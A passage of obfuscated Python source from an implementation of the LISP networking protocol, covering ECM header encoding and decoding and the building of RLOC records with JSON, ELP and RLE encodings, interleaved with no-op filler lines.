packet = self . eid . unpack_address ( packet )
return ( packet )
if 2 - 2: IiII + I11i / iIii1I11I1II1 . i11iIiiIii . i1IIi * ooOoO0o
if 14 - 14: Oo0Ooo . O0 - oO0o - i11iIiiIii
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 8 - 8: I1IiiI / iIii1I11I1II1 / OoooooooOO / Oo0Ooo / ooOoO0o
if 80 - 80: I11i
if 26 - 26: II111iiii + I1IiiI . II111iiii - oO0o % OoO0O00
if 1 - 1: OoO0O00 - II111iiii
if 75 - 75: Oo0Ooo - OoOoOO00 + oO0o % i1IIi * OOooOOo
if 56 - 56: OoOoOO00 / OoO0O00 / I1IiiI % OoooooooOO
if 39 - 39: I1IiiI + II111iiii * Oo0Ooo % Ii1I . o0oOOo0O0Ooo * oO0o
if 42 - 42: Ii1I / Oo0Ooo
if 25 - 25: OoooooooOO % Ii1I * I1Ii111 * I11i + I1IiiI % I1ii11iIi11i
if 70 - 70: Ii1I + I1ii11iIi11i * I11i * i1IIi . I1Ii111
if 76 - 76: OoooooooOO * OoOoOO00 . OoooooooOO
if 46 - 46: ooOoO0o * o0oOOo0O0Ooo % II111iiii / I1Ii111
if 29 - 29: OoO0O00 - i11iIiiIii % Oo0Ooo % o0oOOo0O0Ooo
if 30 - 30: oO0o - Ii1I % Ii1I
if 8 - 8: IiII
if 68 - 68: IiII . OoooooooOO - i11iIiiIii + i11iIiiIii
if 81 - 81: OoOoOO00 + iII111i . i11iIiiIii
if 10 - 10: OoOoOO00 + I11i - iIii1I11I1II1 - I11i
if 58 - 58: ooOoO0o
if 98 - 98: Ii1I / OoO0O00 % OoooooooOO
if 65 - 65: ooOoO0o % Oo0Ooo - I1IiiI % I1Ii111 + iIii1I11I1II1 / iIii1I11I1II1
if 94 - 94: IiII - Oo0Ooo . o0oOOo0O0Ooo - ooOoO0o - oO0o . I11i
if 39 - 39: oO0o + OoOoOO00
if 68 - 68: i1IIi * oO0o / i11iIiiIii
if 96 - 96: I1IiiI
if 78 - 78: OoO0O00
if 72 - 72: I1ii11iIi11i / O0 % II111iiii / II111iiii
if 48 - 48: OOooOOo % OOooOOo / iIii1I11I1II1 - i11iIiiIii
if 57 - 57: I11i / IiII * i1IIi + II111iiii . o0oOOo0O0Ooo
if 11 - 11: II111iiii
if 66 - 66: Ii1I - I1IiiI . OoooooooOO * I1Ii111
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
if 16 - 16: IiII * OoO0O00 * i11iIiiIii - ooOoO0o
class lisp_ecm ( object ) :
def __init__ ( self , sport ) :
self . security = False
self . ddt = False
self . to_etr = False
self . to_ms = False
self . length = 0
self . ttl = LISP_DEFAULT_ECM_TTL
self . protocol = LISP_UDP_PROTOCOL
self . ip_checksum = 0
self . source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . udp_sport = sport
self . udp_dport = LISP_CTRL_PORT
self . udp_checksum = 0
self . udp_length = 0
self . afi = LISP_AFI_NONE
if 88 - 88: iIii1I11I1II1 / Ii1I * IiII / I1Ii111
if 31 - 31: O0 . I1IiiI
def print_ecm ( self ) :
i11 = ( "{} -> flags: {}{}{}{}, " + "inner IP: {} -> {}, inner UDP: {} -> {}" )
if 8 - 8: OoOoOO00
lprint ( i11 . format ( bold ( "ECM" , False ) , "S" if self . security else "s" ,
"D" if self . ddt else "d" , "E" if self . to_etr else "e" ,
"M" if self . to_ms else "m" ,
green ( self . source . print_address ( ) , False ) ,
green ( self . dest . print_address ( ) , False ) , self . udp_sport ,
self . udp_dport ) )
if 99 - 99: iII111i
if 93 - 93: I1Ii111
def encode ( self , packet , inner_source , inner_dest ) :
self . udp_length = len ( packet ) + 8
self . source = inner_source
self . dest = inner_dest
if ( inner_dest . is_ipv4 ( ) ) :
self . afi = LISP_AFI_IPV4
self . length = self . udp_length + 20
if 39 - 39: Ii1I
if ( inner_dest . is_ipv6 ( ) ) :
self . afi = LISP_AFI_IPV6
self . length = self . udp_length
if 10 - 10: OoOoOO00 . iIii1I11I1II1 / I1ii11iIi11i % iII111i / i11iIiiIii
if 14 - 14: i11iIiiIii % o0oOOo0O0Ooo * O0 % iIii1I11I1II1 . IiII - II111iiii
if 14 - 14: Ii1I % ooOoO0o - OoOoOO00
if 52 - 52: OoO0O00 / i1IIi - Ii1I
if 8 - 8: oO0o + ooOoO0o . I1ii11iIi11i . i1IIi / I1IiiI . IiII
if 8 - 8: i1IIi * O0
oOOOoOO = ( LISP_ECM << 28 )
if ( self . security ) : oOOOoOO |= 0x08000000
if ( self . ddt ) : oOOOoOO |= 0x04000000
if ( self . to_etr ) : oOOOoOO |= 0x02000000
if ( self . to_ms ) : oOOOoOO |= 0x01000000
if 60 - 60: Oo0Ooo - II111iiii + I1IiiI
iIiiiII11II = struct . pack ( "I" , socket . htonl ( oOOOoOO ) )
if 71 - 71: I1Ii111 - OoO0O00
o0OO00oo0O = ""
if ( self . afi == LISP_AFI_IPV4 ) :
o0OO00oo0O = struct . pack ( "BBHHHBBH" , 0x45 , 0 , socket . htons ( self . length ) ,
0 , 0 , self . ttl , self . protocol , socket . htons ( self . ip_checksum ) )
o0OO00oo0O += self . source . pack_address ( )
o0OO00oo0O += self . dest . pack_address ( )
o0OO00oo0O = lisp_ip_checksum ( o0OO00oo0O )
if 61 - 61: I1ii11iIi11i * i11iIiiIii * ooOoO0o . I11i
if ( self . afi == LISP_AFI_IPV6 ) :
o0OO00oo0O = struct . pack ( "BBHHBB" , 0x60 , 0 , 0 , socket . htons ( self . length ) ,
self . protocol , self . ttl )
o0OO00oo0O += self . source . pack_address ( )
o0OO00oo0O += self . dest . pack_address ( )
if 35 - 35: I1Ii111 * Oo0Ooo / o0oOOo0O0Ooo
if 89 - 89: oO0o / OoooooooOO . Ii1I + Oo0Ooo + IiII / OoOoOO00
I1iiIi111I = socket . htons ( self . udp_sport )
iiIi = socket . htons ( self . udp_dport )
i1IIiI1iII = socket . htons ( self . udp_length )
I1 = socket . htons ( self . udp_checksum )
Ii1iiI1 = struct . pack ( "HHHH" , I1iiIi111I , iiIi , i1IIiI1iII , I1 )
return ( iIiiiII11II + o0OO00oo0O + Ii1iiI1 )
if 67 - 67: IiII
if 66 - 66: i11iIiiIii * iII111i
def decode ( self , packet ) :
if 51 - 51: OoooooooOO + I11i . iII111i + i11iIiiIii * iII111i - OoO0O00
if 60 - 60: iII111i * iIii1I11I1II1 . OoOoOO00 . o0oOOo0O0Ooo / iIii1I11I1II1
if 36 - 36: i1IIi . OoooooooOO - II111iiii - OoOoOO00 - IiII
if 53 - 53: I1ii11iIi11i - II111iiii . i11iIiiIii
Iii1iIII1Iii = "I"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 76 - 76: iIii1I11I1II1 - Oo0Ooo
oOOOoOO = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 79 - 79: I1IiiI * IiII . OoooooooOO % I1Ii111 * I1Ii111
oOOOoOO = socket . ntohl ( oOOOoOO [ 0 ] )
self . security = True if ( oOOOoOO & 0x08000000 ) else False
self . ddt = True if ( oOOOoOO & 0x04000000 ) else False
self . to_etr = True if ( oOOOoOO & 0x02000000 ) else False
self . to_ms = True if ( oOOOoOO & 0x01000000 ) else False
packet = packet [ oOoOo000Ooooo : : ]
if 17 - 17: I1Ii111 - I1Ii111 . oO0o / I1Ii111
if 36 - 36: I1ii11iIi11i * i1IIi + iIii1I11I1II1
if 55 - 55: I1IiiI . I1Ii111 - I1IiiI % oO0o / iIii1I11I1II1 * Ii1I
if 77 - 77: OOooOOo
if ( len ( packet ) < 1 ) : return ( None )
I1iI1Ii11 = struct . unpack ( "B" , packet [ 0 : 1 ] ) [ 0 ]
I1iI1Ii11 = I1iI1Ii11 >> 4
if 29 - 29: II111iiii % iIii1I11I1II1 * O0 . o0oOOo0O0Ooo
if ( I1iI1Ii11 == 4 ) :
oOoOo000Ooooo = struct . calcsize ( "HHIBBH" )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 56 - 56: i1IIi . ooOoO0o + I11i - i11iIiiIii
ooooO00o0 , i1IIiI1iII , ooooO00o0 , Ii1I111Ii , o00oo , I1 = struct . unpack ( "HHIBBH" , packet [ : oOoOo000Ooooo ] )
self . length = socket . ntohs ( i1IIiI1iII )
self . ttl = Ii1I111Ii
self . protocol = o00oo
self . ip_checksum = socket . ntohs ( I1 )
self . source . afi = self . dest . afi = LISP_AFI_IPV4
if 77 - 77: I1ii11iIi11i / iII111i % OoO0O00 - oO0o
if 69 - 69: oO0o . i11iIiiIii - O0
if 5 - 5: i1IIi + Ii1I
if 38 - 38: I1IiiI . O0 + OOooOOo / I1ii11iIi11i . iIii1I11I1II1 - i1IIi
o00oo = struct . pack ( "H" , 0 )
iIII1ii = struct . calcsize ( "HHIBB" )
oo0ooo00oooo = struct . calcsize ( "H" )
packet = packet [ : iIII1ii ] + o00oo + packet [ iIII1ii + oo0ooo00oooo : ]
if 9 - 9: I11i / I1Ii111 + iIii1I11I1II1 + I1IiiI - II111iiii
packet = packet [ oOoOo000Ooooo : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 96 - 96: iII111i + Oo0Ooo - OoooooooOO . i1IIi + i1IIi % iIii1I11I1II1
if 80 - 80: OoooooooOO / O0 / I1Ii111 - Oo0Ooo . i11iIiiIii
if ( I1iI1Ii11 == 6 ) :
oOoOo000Ooooo = struct . calcsize ( "IHBB" )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 3 - 3: Oo0Ooo - OOooOOo * OoO0O00 - II111iiii . OoooooooOO
ooooO00o0 , i1IIiI1iII , o00oo , Ii1I111Ii = struct . unpack ( "IHBB" , packet [ : oOoOo000Ooooo ] )
self . length = socket . ntohs ( i1IIiI1iII )
self . protocol = o00oo
self . ttl = Ii1I111Ii
self . source . afi = self . dest . afi = LISP_AFI_IPV6
if 14 - 14: I1IiiI
packet = packet [ oOoOo000Ooooo : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 41 - 41: I1Ii111 % i1IIi + OoO0O00 / oO0o
if 48 - 48: i1IIi . Oo0Ooo . i1IIi . I1ii11iIi11i * I1IiiI - Ii1I
self . source . mask_len = self . source . host_mask_len ( )
self . dest . mask_len = self . dest . host_mask_len ( )
if 83 - 83: OoooooooOO
oOoOo000Ooooo = struct . calcsize ( "HHHH" )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 42 - 42: I1ii11iIi11i . i1IIi - OoOoOO00 - oO0o + i11iIiiIii
I1iiIi111I , iiIi , i1IIiI1iII , I1 = struct . unpack ( "HHHH" , packet [ : oOoOo000Ooooo ] )
self . udp_sport = socket . ntohs ( I1iiIi111I )
self . udp_dport = socket . ntohs ( iiIi )
self . udp_length = socket . ntohs ( i1IIiI1iII )
self . udp_checksum = socket . ntohs ( I1 )
packet = packet [ oOoOo000Ooooo : : ]
return ( packet )
if 65 - 65: I1IiiI - O0
if 15 - 15: I11i + OoOoOO00 / Oo0Ooo - I1IiiI * I1ii11iIi11i % oO0o
if 90 - 90: Ii1I / I11i
if 98 - 98: i1IIi
if 97 - 97: I1Ii111 + O0 - II111iiii / I11i
if 84 - 84: iIii1I11I1II1 % Ii1I / OoooooooOO
if 62 - 62: OOooOOo * OoO0O00 * OoO0O00 + OoooooooOO . IiII + OoO0O00
if 13 - 13: O0 . I1IiiI % OoO0O00 - I11i . O0
if 14 - 14: iIii1I11I1II1
if 48 - 48: i11iIiiIii * OoOoOO00 - I1IiiI + iIii1I11I1II1
if 20 - 20: I1ii11iIi11i - iIii1I11I1II1 . iII111i
if 52 - 52: OoO0O00 - I1Ii111
if 9 - 9: I1IiiI . i11iIiiIii
if 3 - 3: I1IiiI + I1ii11iIi11i * I1Ii111 - i1IIi . OOooOOo
if 21 - 21: OOooOOo + o0oOOo0O0Ooo
if 39 - 39: OoOoOO00 . I11i * OOooOOo . i1IIi
if 69 - 69: IiII - i1IIi + o0oOOo0O0Ooo
if 5 - 5: II111iiii
if 88 - 88: OoooooooOO % II111iiii + IiII + IiII * Oo0Ooo
if 81 - 81: I1IiiI * ooOoO0o + I1Ii111
if 49 - 49: I1IiiI % oO0o % II111iiii * II111iiii + OoooooooOO + iII111i
if 58 - 58: i11iIiiIii % iIii1I11I1II1 + OoO0O00 . I1ii11iIi11i . I1IiiI
if 54 - 54: iII111i . OoO0O00 . iIii1I11I1II1
if 45 - 45: I1ii11iIi11i + I1IiiI / i11iIiiIii
if 45 - 45: IiII / O0 * I1IiiI - OOooOOo * I1Ii111
if 19 - 19: OoOoOO00 / IiII - OOooOOo * i11iIiiIii % I1Ii111
if 98 - 98: IiII + IiII + OOooOOo / i1IIi + oO0o
if 53 - 53: OoOoOO00
if 69 - 69: iIii1I11I1II1 * OoO0O00 / OoooooooOO % I1ii11iIi11i . I1IiiI % I11i
if 40 - 40: i11iIiiIii % oO0o / OOooOOo
if 85 - 85: OoO0O00 % O0 . Ii1I . iII111i . iII111i
if 90 - 90: o0oOOo0O0Ooo - Oo0Ooo / ooOoO0o / i1IIi - Ii1I
if 43 - 43: i11iIiiIii - OoooooooOO % ooOoO0o
if 55 - 55: oO0o % Oo0Ooo % IiII
if 65 - 65: IiII * IiII
if 60 - 60: ooOoO0o
if 92 - 92: O0 % IiII
if 15 - 15: O0 % i1IIi - OOooOOo . IiII
if 1 - 1: I1IiiI
if 40 - 40: o0oOOo0O0Ooo % I11i % O0
if 88 - 88: o0oOOo0O0Ooo - oO0o
if 73 - 73: II111iiii
if 7 - 7: O0 / OoO0O00
if 90 - 90: iII111i % oO0o / iIii1I11I1II1
if 52 - 52: I1IiiI / o0oOOo0O0Ooo
if 20 - 20: I1Ii111 . I1IiiI - iIii1I11I1II1 / iII111i
if 46 - 46: I1Ii111 . i11iIiiIii
if 89 - 89: OoO0O00 - OOooOOo - i1IIi - OoO0O00 % iIii1I11I1II1
if 52 - 52: o0oOOo0O0Ooo * O0 + I1ii11iIi11i
if 83 - 83: I11i + OOooOOo - OoooooooOO
if 7 - 7: IiII % ooOoO0o / OoooooooOO / o0oOOo0O0Ooo + OoO0O00 - OoO0O00
if 15 - 15: i1IIi + OOooOOo / Ii1I
if 51 - 51: OOooOOo + O0
if 91 - 91: i11iIiiIii + o0oOOo0O0Ooo % OoO0O00 / oO0o - i1IIi
if 82 - 82: Ii1I . OoooooooOO + OoooooooOO % OoO0O00 % I1ii11iIi11i
if 65 - 65: Oo0Ooo . I11i
if 7 - 7: Oo0Ooo * II111iiii
if 11 - 11: OoOoOO00 % OoooooooOO
if 92 - 92: OoOoOO00 - iII111i * Ii1I - i1IIi
if 87 - 87: Ii1I * I1Ii111 + iIii1I11I1II1 * o0oOOo0O0Ooo * iIii1I11I1II1 . I11i
if 66 - 66: Ii1I / OoO0O00 . O0 . I11i % OoooooooOO / OOooOOo
if 49 - 49: I1IiiI * iII111i - OoO0O00 % Ii1I + Ii1I * I1Ii111
if 94 - 94: OoOoOO00 - I11i + Ii1I + OoOoOO00 + II111iiii
if 61 - 61: IiII + Ii1I / oO0o . OoooooooOO + iII111i
if 29 - 29: OOooOOo
if 69 - 69: oO0o % OoooooooOO * iII111i
if 58 - 58: oO0o / i11iIiiIii . OoOoOO00 % O0 / iIii1I11I1II1
if 50 - 50: I1Ii111 . I11i / O0 . I11i
if 91 - 91: i11iIiiIii . I1ii11iIi11i + I11i
if 67 - 67: I1ii11iIi11i * I1Ii111 * I1IiiI / I11i - IiII + oO0o
if 11 - 11: O0 + i1IIi / o0oOOo0O0Ooo * OoO0O00
if 64 - 64: i1IIi % IiII . ooOoO0o . iIii1I11I1II1 + OoO0O00 - iIii1I11I1II1
if 52 - 52: II111iiii - IiII
if 91 - 91: iIii1I11I1II1 + iII111i . I11i % i11iIiiIii - i11iIiiIii + I1IiiI
if 75 - 75: I1ii11iIi11i / I1IiiI - iIii1I11I1II1 / OoO0O00 * OOooOOo
if 73 - 73: OoooooooOO % IiII / I1Ii111 * I11i + i1IIi % i11iIiiIii
if 91 - 91: i11iIiiIii
if 6 - 6: O0 - iIii1I11I1II1 + I1Ii111 . o0oOOo0O0Ooo * i11iIiiIii
if 53 - 53: OOooOOo / I1IiiI / oO0o * OOooOOo / i1IIi - I1Ii111
if 71 - 71: O0 + Oo0Ooo % oO0o - o0oOOo0O0Ooo
if 82 - 82: iIii1I11I1II1
if 64 - 64: ooOoO0o + I1IiiI % OOooOOo + II111iiii
if 46 - 46: I1IiiI
if 72 - 72: iII111i
if 100 - 100: I1IiiI
if 55 - 55: i1IIi % IiII
if 44 - 44: oO0o - iIii1I11I1II1 / ooOoO0o - iIii1I11I1II1 % i1IIi + ooOoO0o
if 74 - 74: I11i . OoOoOO00 + OoOoOO00
if 87 - 87: IiII + o0oOOo0O0Ooo . i1IIi % I1Ii111
if 44 - 44: Oo0Ooo - OOooOOo . Ii1I * OoooooooOO
if 93 - 93: OoO0O00 . OoO0O00
if 52 - 52: OOooOOo . oO0o / Oo0Ooo . OoooooooOO % I1ii11iIi11i
if 65 - 65: ooOoO0o % II111iiii . iII111i - iIii1I11I1II1 - I1IiiI
if 63 - 63: I1IiiI . OoOoOO00 - II111iiii
if 55 - 55: ooOoO0o - o0oOOo0O0Ooo
if 32 - 32: I1Ii111 * Ii1I / I1Ii111 . OoOoOO00 + I1ii11iIi11i - ooOoO0o
if 14 - 14: IiII * O0 + O0 - ooOoO0o . i11iIiiIii - IiII
if 37 - 37: I11i
if 19 - 19: OoooooooOO % I1Ii111
if 57 - 57: OoOoOO00 + i1IIi . iIii1I11I1II1 . iIii1I11I1II1 / iIii1I11I1II1 % oO0o
if 7 - 7: i11iIiiIii * I1ii11iIi11i / OoO0O00 * oO0o
if 35 - 35: IiII . i1IIi + I1ii11iIi11i . IiII + ooOoO0o . oO0o
if 2 - 2: II111iiii
if 18 - 18: iIii1I11I1II1 % I1ii11iIi11i % Oo0Ooo
if 47 - 47: ooOoO0o - I1IiiI % OOooOOo * Ii1I % I1IiiI
if 95 - 95: OoO0O00 + OoOoOO00 % Oo0Ooo . Ii1I * I1IiiI + I1Ii111
if 22 - 22: Oo0Ooo . OoO0O00
if 55 - 55: Oo0Ooo % OoooooooOO * II111iiii % OoooooooOO
if 30 - 30: I1Ii111 / o0oOOo0O0Ooo + OoooooooOO + OoOoOO00 + OoO0O00
if 40 - 40: OoooooooOO / IiII
if 82 - 82: i11iIiiIii - oO0o - i1IIi
if 78 - 78: oO0o % iII111i / i1IIi / ooOoO0o
if 44 - 44: o0oOOo0O0Ooo + Ii1I + I1IiiI % O0
if 100 - 100: OoooooooOO
if 27 - 27: i11iIiiIii % II111iiii + I1Ii111
if 76 - 76: OOooOOo - I1Ii111 + iIii1I11I1II1 + I1IiiI * oO0o
if 93 - 93: i11iIiiIii * i11iIiiIii - I1IiiI + iIii1I11I1II1 * i11iIiiIii
if 14 - 14: ooOoO0o . OoooooooOO . I1IiiI - IiII + iIii1I11I1II1
if 47 - 47: OOooOOo % i1IIi
if 23 - 23: Ii1I * Ii1I / I11i
if 11 - 11: OOooOOo
if 58 - 58: OoO0O00 * OoooooooOO
if 47 - 47: iII111i - Oo0Ooo
if 19 - 19: O0 . i1IIi + I11i / II111iiii + ooOoO0o
if 26 - 26: Ii1I * oO0o % I1IiiI - OOooOOo . I1Ii111
if 35 - 35: i1IIi % i11iIiiIii + Ii1I
if 14 - 14: OoO0O00 * OoooooooOO
if 45 - 45: iIii1I11I1II1 * I1IiiI . OoOoOO00
if 97 - 97: I11i % II111iiii % Ii1I . II111iiii . iIii1I11I1II1
if 98 - 98: i11iIiiIii + O0 - O0 - iII111i
if 25 - 25: oO0o / O0 + I1Ii111 % i11iIiiIii / I1IiiI
if 62 - 62: iII111i . I11i * i1IIi + iII111i
if 95 - 95: Ii1I / o0oOOo0O0Ooo % ooOoO0o - I1IiiI / OOooOOo * OOooOOo
if 6 - 6: OoO0O00 % IiII + iIii1I11I1II1
if 18 - 18: II111iiii . Ii1I + OoOoOO00 + O0 - I11i
class lisp_rloc_record ( object ) :
def __init__ ( self ) :
self . priority = 0
self . weight = 0
self . mpriority = 0
self . mweight = 0
self . local_bit = False
self . probe_bit = False
self . reach_bit = False
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . rloc_name = None
self . keys = None
if 30 - 30: II111iiii
if 26 - 26: I11i - i1IIi - Oo0Ooo * O0 * OOooOOo . OoooooooOO
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
oOo = self . rloc_name
if ( cour ) : oOo = lisp_print_cour ( oOo )
return ( 'rloc-name: {}' . format ( blue ( oOo , cour ) ) )
if 41 - 41: OOooOOo . iIii1I11I1II1 + ooOoO0o * I1Ii111 % i1IIi
if 17 - 17: OoO0O00
def print_record ( self , indent ) :
o00oO = self . print_rloc_name ( )
if ( o00oO != "" ) : o00oO = ", " + o00oO
oOIIi = ""
if ( self . geo ) :
ooO0o = ""
if ( self . geo . geo_name ) : ooO0o = "'{}' " . format ( self . geo . geo_name )
oOIIi = ", geo: {}{}" . format ( ooO0o , self . geo . print_geo ( ) )
if 3 - 3: o0oOOo0O0Ooo
iIII1Iiii = ""
if ( self . elp ) :
ooO0o = ""
if ( self . elp . elp_name ) : ooO0o = "'{}' " . format ( self . elp . elp_name )
iIII1Iiii = ", elp: {}{}" . format ( ooO0o , self . elp . print_elp ( True ) )
if 2 - 2: Ii1I . iII111i + OoOoOO00 / IiII - I1IiiI % I1IiiI
IIIi1iI1 = ""
if ( self . rle ) :
ooO0o = ""
if ( self . rle . rle_name ) : ooO0o = "'{}' " . format ( self . rle . rle_name )
IIIi1iI1 = ", rle: {}{}" . format ( ooO0o , self . rle . print_rle ( False ,
True ) )
if 21 - 21: OOooOOo % O0 / I11i
IiiiIiii = ""
if ( self . json ) :
ooO0o = ""
if ( self . json . json_name ) :
ooO0o = "'{}' " . format ( self . json . json_name )
if 76 - 76: i1IIi
IiiiIiii = ", json: {}" . format ( self . json . print_json ( False ) )
if 38 - 38: I1IiiI
if 15 - 15: o0oOOo0O0Ooo
ooOo = ""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
ooOo = ", " + self . keys [ 1 ] . print_keys ( )
if 74 - 74: o0oOOo0O0Ooo % oO0o % iII111i / I1ii11iIi11i / O0 % I1Ii111
if 48 - 48: i11iIiiIii + I11i
i11 = ( "{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}" )
lprint ( i11 . format ( indent , self . print_flags ( ) , self . priority ,
self . weight , self . mpriority , self . mweight , self . rloc . afi ,
red ( self . rloc . print_address_no_iid ( ) , False ) , o00oO , oOIIi ,
iIII1Iiii , IIIi1iI1 , IiiiIiii , ooOo ) )
if 60 - 60: OoOoOO00 + i11iIiiIii
if 3 - 3: II111iiii
def print_flags ( self ) :
return ( "{}{}{}" . format ( "L" if self . local_bit else "l" , "P" if self . probe_bit else "p" , "R" if self . reach_bit else "r" ) )
if 72 - 72: I1Ii111 * OoO0O00 + Oo0Ooo / Ii1I % OOooOOo
if 84 - 84: OoOoOO00 / o0oOOo0O0Ooo
if 9 - 9: Ii1I
def store_rloc_entry ( self , rloc_entry ) :
OooOOoOO0OO = rloc_entry . rloc if ( rloc_entry . translated_rloc . is_null ( ) ) else rloc_entry . translated_rloc
if 50 - 50: OOooOOo + iIii1I11I1II1
self . rloc . copy_address ( OooOOoOO0OO )
if 76 - 76: iIii1I11I1II1 + I1ii11iIi11i + iIii1I11I1II1 + OoO0O00
if ( rloc_entry . rloc_name ) :
self . rloc_name = rloc_entry . rloc_name
if 83 - 83: i1IIi + Oo0Ooo . O0 / IiII - II111iiii + ooOoO0o
if 17 - 17: OOooOOo
if ( rloc_entry . geo ) :
self . geo = rloc_entry . geo
else :
ooO0o = rloc_entry . geo_name
if ( ooO0o and ooO0o in lisp_geo_list ) :
self . geo = lisp_geo_list [ ooO0o ]
if 93 - 93: Oo0Ooo / II111iiii . Oo0Ooo + i1IIi + i1IIi
if 30 - 30: OoOoOO00 . OOooOOo % OOooOOo / II111iiii + i1IIi
if ( rloc_entry . elp ) :
self . elp = rloc_entry . elp
else :
ooO0o = rloc_entry . elp_name
if ( ooO0o and ooO0o in lisp_elp_list ) :
self . elp = lisp_elp_list [ ooO0o ]
if 61 - 61: i1IIi % II111iiii * II111iiii . o0oOOo0O0Ooo / I1ii11iIi11i - I1Ii111
if 93 - 93: Ii1I - i1IIi
if ( rloc_entry . rle ) :
self . rle = rloc_entry . rle
else :
ooO0o = rloc_entry . rle_name
if ( ooO0o and ooO0o in lisp_rle_list ) :
self . rle = lisp_rle_list [ ooO0o ]
if 3 - 3: oO0o + OoO0O00 - iII111i / Ii1I
if 58 - 58: Ii1I * I11i
if ( rloc_entry . json ) :
self . json = rloc_entry . json
else :
ooO0o = rloc_entry . json_name
if ( ooO0o and ooO0o in lisp_json_list ) :
self . json = lisp_json_list [ ooO0o ]
if 95 - 95: oO0o
if 49 - 49: I1IiiI
self . priority = rloc_entry . priority
self . weight = rloc_entry . weight
self . mpriority = rloc_entry . mpriority
self . mweight = rloc_entry . mweight
if 23 - 23: I1Ii111
if 5 - 5: I1ii11iIi11i % OoOoOO00 . OoooooooOO . o0oOOo0O0Ooo + i11iIiiIii
def encode_json ( self , lisp_json ) :
Ii111I1iIiiIi = lisp_json . json_string
o0Oo0OOO0 = 0
if ( lisp_json . json_encrypted ) :
o0Oo0OOO0 = ( lisp_json . json_key_id << 5 ) | 0x02
if 73 - 73: OoOoOO00 % oO0o / O0 - OoooooooOO
if 87 - 87: iIii1I11I1II1
ooOoOoOo = LISP_LCAF_JSON_TYPE
O0oOo = socket . htons ( LISP_AFI_LCAF )
I1I1IIi11II = self . rloc . addr_length ( ) + 2
if 64 - 64: I11i * i1IIi + i1IIi * I1ii11iIi11i . ooOoO0o
iIi1IiiIII = socket . htons ( len ( Ii111I1iIiiIi ) + I1I1IIi11II )
if 37 - 37: I11i % iIii1I11I1II1 % I1ii11iIi11i
i11iI1I1I11II = socket . htons ( len ( Ii111I1iIiiIi ) )
OO0Oo00OO0oo = struct . pack ( "HBBBBHH" , O0oOo , 0 , 0 , ooOoOoOo , o0Oo0OOO0 ,
iIi1IiiIII , i11iI1I1I11II )
OO0Oo00OO0oo += Ii111I1iIiiIi . encode ( )
if 61 - 61: o0oOOo0O0Ooo * O0
if 84 - 84: I11i * oO0o
if 89 - 89: o0oOOo0O0Ooo
if 95 - 95: i1IIi . OoOoOO00 % OoOoOO00 + OOooOOo / OoooooooOO
if ( lisp_is_json_telemetry ( Ii111I1iIiiIi ) ) :
OO0Oo00OO0oo += struct . pack ( "H" , socket . htons ( self . rloc . afi ) )
OO0Oo00OO0oo += self . rloc . pack_address ( )
else :
OO0Oo00OO0oo += struct . pack ( "H" , 0 )
if 39 - 39: OoO0O00 % iII111i . oO0o . II111iiii - i11iIiiIii
return ( OO0Oo00OO0oo )
if 85 - 85: O0 - OoOoOO00
if 17 - 17: o0oOOo0O0Ooo / i1IIi / OOooOOo
def encode_lcaf ( self ) :
O0oOo = socket . htons ( LISP_AFI_LCAF )
OOO0 = b""
if ( self . geo ) :
OOO0 = self . geo . encode_geo ( )
if 13 - 13: I11i / OoooooooOO - I1Ii111
if 78 - 78: iII111i . oO0o . I1IiiI % O0 * ooOoO0o % I1Ii111
ii1111I = b""
if ( self . elp ) :
IIii11 = b""
for oO0 in self . elp . elp_nodes :
O0ooO0O00oo0 = socket . htons ( oO0 . address . afi )
IIi1 = 0
if ( oO0 . eid ) : IIi1 |= 0x4
if ( oO0 . probe ) : IIi1 |= 0x2
if ( oO0 . strict ) : IIi1 |= 0x1
IIi1 = socket . htons ( IIi1 )
IIii11 += struct . pack ( "HH" , IIi1 , O0ooO0O00oo0 )
IIii11 += oO0 . address . pack_address ( )
if 61 - 61: Ii1I
if 48 - 48: I1IiiI - i11iIiiIii * I1ii11iIi11i
oOOO0o0O00OO = socket . htons ( len ( IIii11 ) )
ii1111I = struct . pack ( "HBBBBH" , O0oOo , 0 , 0 , LISP_LCAF_ELP_TYPE ,
0 , oOOO0o0O00OO )
ii1111I += IIii11
if 90 - 90: I1Ii111 * OoO0O00
if 51 - 51: i1IIi
oOOoOooo0oOO0 = b""
if ( self . rle ) :
o00o0O0oo = b""
for IIIi11i1 in self . rle . rle_nodes :
O0ooO0O00oo0 = socket . htons ( IIIi11i1 . address . afi )
o00o0O0oo += struct . pack ( "HBBH" , 0 , 0 , IIIi11i1 . level , O0ooO0O00oo0 )
o00o0O0oo += IIIi11i1 . address . pack_address ( )
if ( IIIi11i1 . rloc_name ) :
o00o0O0oo += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
o00o0O0oo += ( IIIi11i1 . rloc_name + "\0" ) . encode ( )
if 67 - 67: II111iiii
if 81 - 81: oO0o . Oo0Ooo + O0 * o0oOOo0O0Ooo % OOooOOo
if 98 - 98: oO0o / iIii1I11I1II1 - OoOoOO00
I1Ii1i111I = socket . htons ( len ( o00o0O0oo ) )
oOOoOooo0oOO0 = struct . pack ( "HBBBBH" , O0oOo , 0 , 0 , LISP_LCAF_RLE_TYPE ,
0 , I1Ii1i111I )
oOOoOooo0oOO0 += o00o0O0oo
